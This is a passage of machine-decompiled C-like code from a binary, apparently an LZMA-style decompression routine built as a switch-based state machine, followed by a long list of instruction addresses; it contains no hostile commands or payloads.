							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                        0x00000000
                                                        0x00406ca2
                                                        0x00406ca2
                                                        0x00406ca6
                                                        0x00406d5d
                                                        0x00406d60
                                                        0x00406d6c
                                                        0x00406c4d
                                                        0x00406c4d
                                                        0x00406c50
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fcb
                                                        0x00406fd1
                                                        0x00406fd7
                                                        0x00406ff1
                                                        0x00406ff4
                                                        0x00406ffa
                                                        0x00407005
                                                        0x00407007
                                                        0x00406fd9
                                                        0x00406fd9
                                                        0x00406fe8
                                                        0x00406fec
                                                        0x00406fec
                                                        0x00407011
                                                        0x00407038
                                                        0x00407038
                                                        0x0040703e
                                                        0x0040703e
                                                        0x00000000
                                                        0x00407013
                                                        0x00407013
                                                        0x00407017
                                                        0x004071c6
                                                        0x00000000
                                                        0x004071c6
                                                        0x00407023
                                                        0x0040702a
                                                        0x00407032
                                                        0x00407035
                                                        0x00000000
                                                        0x00407035
                                                        0x00406cac
                                                        0x00406cb0
                                                        0x004071f1
                                                        0x004071f1
                                                        0x004071f4
                                                        0x004071f8
                                                        0x004071f8
                                                        0x00406cb6
                                                        0x00406cbc
                                                        0x00406cbf
                                                        0x00406cc3
                                                        0x00406cc6
                                                        0x00406cca
                                                        0x00407190
                                                        0x004071dc
                                                        0x004071e4
                                                        0x004071eb
                                                        0x004071ed
                                                        0x00000000
                                                        0x004071ed
                                                        0x00406cd0
                                                        0x00406cd3
                                                        0x00406cd9
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cde
                                                        0x00406ce1
                                                        0x00406ce4
                                                        0x00406ce7
                                                        0x00406cea
                                                        0x00406ced
                                                        0x00406cee
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf3
                                                        0x00406cf6
                                                        0x00406cf9
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cff
                                                        0x00406d01
                                                        0x00406d01
                                                        0x00406d04
                                                        0x00406d04
                                                        0x00406d04
                                                        0x004067da
                                                        0x004067da
                                                        0x004067e3
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x00000000
                                                        0x004067f4
                                                        0x00000000
                                                        0x00000000
                                                        0x004067fd
                                                        0x00406800
                                                        0x00406803
                                                        0x00406807
                                                        0x00000000
                                                        0x00000000
                                                        0x0040680d
                                                        0x00406810
                                                        0x00406812
                                                        0x00406813
                                                        0x00406816
                                                        0x00406818
                                                        0x00406819
                                                        0x0040681b
                                                        0x0040681e
                                                        0x00406823
                                                        0x00406828
                                                        0x00406831
                                                        0x00406844
                                                        0x00406847
                                                        0x00406853
                                                        0x0040687b
                                                        0x0040687d
                                                        0x0040688b
                                                        0x0040688b
                                                        0x0040688f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040687f
                                                        0x0040687f
                                                        0x00406882
                                                        0x00406883
                                                        0x00406883
                                                        0x00000000
                                                        0x0040687f
                                                        0x00406859
                                                        0x0040685e
                                                        0x0040685e
                                                        0x00406867
                                                        0x0040686f
                                                        0x00406872
                                                        0x00000000
                                                        0x00406878
                                                        0x00406878
                                                        0x00000000
                                                        0x00406878
                                                        0x00000000
                                                        0x00406895
                                                        0x00406895
                                                        0x00406899
                                                        0x00407145
                                                        0x00000000
                                                        0x00407145
                                                        0x004068a2
                                                        0x004068b2
                                                        0x004068b5
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068bb
                                                        0x004068bf
                                                        0x00000000
                                                        0x00000000
                                                        0x004068c1
                                                        0x004068c7
                                                        0x004068f1
                                                        0x004068f7
                                                        0x004068fe
                                                        0x00000000
                                                        0x004068fe
                                                        0x004068cd
                                                        0x004068d0
                                                        0x004068d5
                                                        0x004068d5
                                                        0x004068e0
                                                        0x004068e8
                                                        0x004068eb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406930
                                                        0x00406936
                                                        0x00406939
                                                        0x00406946
                                                        0x0040694e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406905
                                                        0x00406905
                                                        0x00406909
                                                        0x00407154
                                                        0x00000000
                                                        0x00407154
                                                        0x00406915
                                                        0x00406920
                                                        0x00406920
                                                        0x00406920
                                                        0x00406923
                                                        0x00406926
                                                        0x00406929
                                                        0x0040692e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406956
                                                        0x00406958
                                                        0x0040695b
                                                        0x004069cc
                                                        0x004069cf
                                                        0x004069d2
                                                        0x004069d9
                                                        0x004069e3
                                                        0x00000000
                                                        0x004069e3
                                                        0x0040695d
                                                        0x00406961
                                                        0x00406964
                                                        0x00406966
                                                        0x00406969
                                                        0x0040696c
                                                        0x0040696e
                                                        0x00406971
                                                        0x00406973
                                                        0x00406978
                                                        0x0040697b
                                                        0x0040697e
                                                        0x00406982
                                                        0x00406989
                                                        0x0040698c
                                                        0x00406993
                                                        0x00406997
                                                        0x0040699f
                                                        0x0040699f
                                                        0x0040699f
                                                        0x00406999
                                                        0x00406999
                                                        0x00406999
                                                        0x0040698e
                                                        0x0040698e
                                                        0x0040698e
                                                        0x004069a3
                                                        0x004069a6
                                                        0x004069c4
                                                        0x004069c6
                                                        0x00000000
                                                        0x004069a8
                                                        0x004069a8
                                                        0x004069ab
                                                        0x004069ae
                                                        0x004069b1
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b6
                                                        0x004069b9
                                                        0x004069bb
                                                        0x004069bc
                                                        0x004069bf
                                                        0x00000000
                                                        0x004069bf
                                                        0x00000000
                                                        0x00406bf5
                                                        0x00406bf9
                                                        0x00406c17
                                                        0x00406c1a
                                                        0x00406c21
                                                        0x00406c24
                                                        0x00406c27
                                                        0x00406c2a
                                                        0x00406c2d
                                                        0x00406c30
                                                        0x00406c32
                                                        0x00406c39
                                                        0x00406c3a
                                                        0x00406c3c
                                                        0x00406c3f
                                                        0x00406c42
                                                        0x00406c45
                                                        0x00406c45
                                                        0x00406c4a
                                                        0x00000000
                                                        0x00406c4a
                                                        0x00406bfb
                                                        0x00406bfe
                                                        0x00406c01
                                                        0x00406c0b
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c5f
                                                        0x00406c63
                                                        0x00406c86
                                                        0x00406c89
                                                        0x00406c8c
                                                        0x00406c96
                                                        0x00406c65
                                                        0x00406c65
                                                        0x00406c68
                                                        0x00406c6b
                                                        0x00406c6e
                                                        0x00406c7b
                                                        0x00406c7e
                                                        0x00406c7e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d13
                                                        0x00406d17
                                                        0x00406d1e
                                                        0x00406d21
                                                        0x00406d24
                                                        0x00406d2e
                                                        0x00000000
                                                        0x00406d2e
                                                        0x00406d19
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d3a
                                                        0x00406d3e
                                                        0x00406d45
                                                        0x00406d48
                                                        0x00406d4b
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d4e
                                                        0x00406d51
                                                        0x00406d54
                                                        0x00406d54
                                                        0x00406d57
                                                        0x00406d5a
                                                        0x00000000
                                                        0x00000000
                                                        0x00406dfa
                                                        0x00406dfa
                                                        0x00406dfe
                                                        0x0040719c
                                                        0x00000000
                                                        0x0040719c
                                                        0x00406e04
                                                        0x00406e07
                                                        0x00406e0a
                                                        0x00406e0e
                                                        0x00406e11
                                                        0x00406e17
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e1c
                                                        0x00406e1f
                                                        0x00000000
                                                        0x00000000
                                                        0x004069ef
                                                        0x004069ef
                                                        0x004069f3
                                                        0x00407160
                                                        0x00000000
                                                        0x00407160
                                                        0x004069f9
                                                        0x004069fc
                                                        0x004069ff
                                                        0x00406a03
                                                        0x00406a06
                                                        0x00406a0c
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a11
                                                        0x00406a14
                                                        0x00406a14
                                                        0x00406a17
                                                        0x00406a1a
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a20
                                                        0x00406a26
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a2c
                                                        0x00406a2c
                                                        0x00406a30
                                                        0x00406a33
                                                        0x00406a36
                                                        0x00406a39
                                                        0x00406a3c
                                                        0x00406a3d
                                                        0x00406a40
                                                        0x00406a42
                                                        0x00406a48
                                                        0x00406a4b
                                                        0x00406a4e
                                                        0x00406a51
                                                        0x00406a54
                                                        0x00406a57
                                                        0x00406a5a
                                                        0x00406a76
                                                        0x00406a79
                                                        0x00406a7c
                                                        0x00406a7f
                                                        0x00406a86
                                                        0x00406a8a
                                                        0x00406a8c
                                                        0x00406a90
                                                        0x00406a5c
                                                        0x00406a5c
                                                        0x00406a60
                                                        0x00406a68
                                                        0x00406a6d
                                                        0x00406a6f
                                                        0x00406a71
                                                        0x00406a71
                                                        0x00406a93
                                                        0x00406a9a
                                                        0x00406a9d
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa8
                                                        0x00406aa8
                                                        0x00406aac
                                                        0x0040716c
                                                        0x00000000
                                                        0x0040716c
                                                        0x00406ab2
                                                        0x00406ab5
                                                        0x00406ab8
                                                        0x00406abc
                                                        0x00406abf
                                                        0x00406ac5
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406aca
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406ad3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ad5
                                                        0x00406ad8
                                                        0x00406adb
                                                        0x00406ade
                                                        0x00406ae1
                                                        0x00406ae4
                                                        0x00406ae7
                                                        0x00406aea
                                                        0x00406aed
                                                        0x00406af0
                                                        0x00406af3
                                                        0x00406b0b
                                                        0x00406b0e
                                                        0x00406b11
                                                        0x00406b14
                                                        0x00406b14
                                                        0x00406b17
                                                        0x00406b1b
                                                        0x00406b1d
                                                        0x00406af5
                                                        0x00406af5
                                                        0x00406afd
                                                        0x00406b02
                                                        0x00406b04
                                                        0x00406b06
                                                        0x00406b06
                                                        0x00406b20
                                                        0x00406b27
                                                        0x00406b2a
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00406b2a
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b6c
                                                        0x00406b6c
                                                        0x00406b70
                                                        0x00407178
                                                        0x00000000
                                                        0x00407178
                                                        0x00406b76
                                                        0x00406b79
                                                        0x00406b7c
                                                        0x00406b80
                                                        0x00406b83
                                                        0x00406b89
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8e
                                                        0x00406b91
                                                        0x00406b91
                                                        0x00406b97
                                                        0x00406b35
                                                        0x00406b35
                                                        0x00406b38
                                                        0x00000000
                                                        0x00406b38
                                                        0x00406b99
                                                        0x00406b99
                                                        0x00406b9c
                                                        0x00406b9f
                                                        0x00406ba2
                                                        0x00406ba5
                                                        0x00406ba8
                                                        0x00406bab
                                                        0x00406bae
                                                        0x00406bb1
                                                        0x00406bb4
                                                        0x00406bb7
                                                        0x00406bcf
                                                        0x00406bd2
                                                        0x00406bd5
                                                        0x00406bd8
                                                        0x00406bd8
                                                        0x00406bdb
                                                        0x00406bdf
                                                        0x00406be1
                                                        0x00406bb9
                                                        0x00406bb9
                                                        0x00406bc1
                                                        0x00406bc6
                                                        0x00406bc8
                                                        0x00406bca
                                                        0x00406bca
                                                        0x00406be4
                                                        0x00406beb
                                                        0x00406bee
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406e7d
                                                        0x00406e7d
                                                        0x00406e81
                                                        0x004071a8
                                                        0x00000000
                                                        0x004071a8
                                                        0x00406e87
                                                        0x00406e8a
                                                        0x00406e8d
                                                        0x00406e91
                                                        0x00406e94
                                                        0x00406e9a
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f8c
                                                        0x00406f90
                                                        0x00406fb2
                                                        0x00406fb5
                                                        0x00406fbf
                                                        0x00000000
                                                        0x00406fbf
                                                        0x00406f92
                                                        0x00406f95
                                                        0x00406f99
                                                        0x00406f9c
                                                        0x00406f9c
                                                        0x00406f9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00407049
                                                        0x0040704d
                                                        0x0040706b
                                                        0x0040706b
                                                        0x0040706b
                                                        0x00407072
                                                        0x00407079
                                                        0x00407080
                                                        0x00407080
                                                        0x00000000
                                                        0x00407080
                                                        0x0040704f
                                                        0x00407052
                                                        0x00407055
                                                        0x00407058
                                                        0x0040705f
                                                        0x00406fa3
                                                        0x00406fa3
                                                        0x00406fa6
                                                        0x00000000
                                                        0x00000000
                                                        0x0040713a
                                                        0x0040713d
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d74
                                                        0x00406d76
                                                        0x00406d7d
                                                        0x00406d7e
                                                        0x00406d80
                                                        0x00406d83
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d8b
                                                        0x00406d8e
                                                        0x00406d91
                                                        0x00406d93
                                                        0x00406d95
                                                        0x00406d95
                                                        0x00406d96
                                                        0x00406d99
                                                        0x00406da0
                                                        0x00406da3
                                                        0x00406db1
                                                        0x00000000
                                                        0x00000000
                                                        0x00407087
                                                        0x00407087
                                                        0x0040708a
                                                        0x00407091
                                                        0x00000000
                                                        0x00000000
                                                        0x00407096
                                                        0x00407096
                                                        0x0040709a
                                                        0x004071d2
                                                        0x00000000
                                                        0x004071d2
                                                        0x004070a0
                                                        0x004070a3
                                                        0x004070a6
                                                        0x004070aa
                                                        0x004070ad
                                                        0x004070b3
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b8
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070be
                                                        0x004070be
                                                        0x004070c2
                                                        0x00407122
                                                        0x00407125
                                                        0x0040712a
                                                        0x0040712b
                                                        0x0040712d
                                                        0x0040712f
                                                        0x00407132
                                                        0x00000000
                                                        0x00407132
                                                        0x004070c4
                                                        0x004070ca
                                                        0x004070cd
                                                        0x004070d0
                                                        0x004070d3
                                                        0x004070d6
                                                        0x004070d9
                                                        0x004070dc
                                                        0x004070df
                                                        0x004070e2
                                                        0x004070e5
                                                        0x004070fe
                                                        0x00407101
                                                        0x00407104
                                                        0x00407107
                                                        0x0040710b
                                                        0x0040710d
                                                        0x0040710d
                                                        0x0040710e
                                                        0x00407111
                                                        0x004070e7
                                                        0x004070e7
                                                        0x004070ef
                                                        0x004070f4
                                                        0x004070f6
                                                        0x004070f9
                                                        0x004070f9
                                                        0x00407114
                                                        0x0040711b
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x00406db9
                                                        0x00406dbc
                                                        0x00406df2
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f25
                                                        0x00406f25
                                                        0x00406f28
                                                        0x00406f2a
                                                        0x004071b4
                                                        0x00000000
                                                        0x004071b4
                                                        0x00406f30
                                                        0x00406f33
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f39
                                                        0x00406f3d
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00000000
                                                        0x00406f40
                                                        0x00406dbe
                                                        0x00406dc0
                                                        0x00406dc2
                                                        0x00406dc4
                                                        0x00406dc7
                                                        0x00406dc8
                                                        0x00406dca
                                                        0x00406dcc
                                                        0x00406dcf
                                                        0x00406dd2
                                                        0x00406de8
                                                        0x00406ded
                                                        0x00406e25
                                                        0x00406e25
                                                        0x00406e29
                                                        0x00406e55
                                                        0x00406e57
                                                        0x00406e5e
                                                        0x00406e61
                                                        0x00406e64
                                                        0x00406e64
                                                        0x00406e69
                                                        0x00406e69
                                                        0x00406e6b
                                                        0x00406e6e
                                                        0x00406e75
                                                        0x00406e78
                                                        0x00406ea5
                                                        0x00406ea5
                                                        0x00406ea8
                                                        0x00406eab
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00000000
                                                        0x00406f1f
                                                        0x00406ead
                                                        0x00406eb3
                                                        0x00406eb6
                                                        0x00406eb9
                                                        0x00406ebc
                                                        0x00406ebf
                                                        0x00406ec2
                                                        0x00406ec5
                                                        0x00406ec8
                                                        0x00406ecb
                                                        0x00406ece
                                                        0x00406ee7
                                                        0x00406ee9
                                                        0x00406eec
                                                        0x00406eed
                                                        0x00406ef0
                                                        0x00406ef2
                                                        0x00406ef5
                                                        0x00406ef7
                                                        0x00406ef9
                                                        0x00406efc
                                                        0x00406efe
                                                        0x00406f01
                                                        0x00406f05
                                                        0x00406f07
                                                        0x00406f07
                                                        0x00406f08
                                                        0x00406f0b
                                                        0x00406f0e
                                                        0x00406ed0
                                                        0x00406ed0
                                                        0x00406ed8
                                                        0x00406edd
                                                        0x00406edf
                                                        0x00406ee2
                                                        0x00406ee2
                                                        0x00406f11
                                                        0x00406f18
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00406f18
                                                        0x00406e2b
                                                        0x00406e2e
                                                        0x00406e30
                                                        0x00406e33
                                                        0x00406e36
                                                        0x00406e39
                                                        0x00406e3b
                                                        0x00406e3e
                                                        0x00406e41
                                                        0x00406e41
                                                        0x00406e44
                                                        0x00406e44
                                                        0x00406e47
                                                        0x00406e4e
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00000000
                                                        0x00406e50
                                                        0x00000000
                                                        0x00406e50
                                                        0x00406e4e
                                                        0x00406dd4
                                                        0x00406dd7
                                                        0x00406dd9
                                                        0x00406ddc
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b3b
                                                        0x00406b3b
                                                        0x00406b3f
                                                        0x00407184
                                                        0x00000000
                                                        0x00407184
                                                        0x00406b45
                                                        0x00406b48
                                                        0x00406b4b
                                                        0x00406b4e
                                                        0x00406b51
                                                        0x00406b54
                                                        0x00406b57
                                                        0x00406b59
                                                        0x00406b5c
                                                        0x00406b5f
                                                        0x00406b62
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00406b64
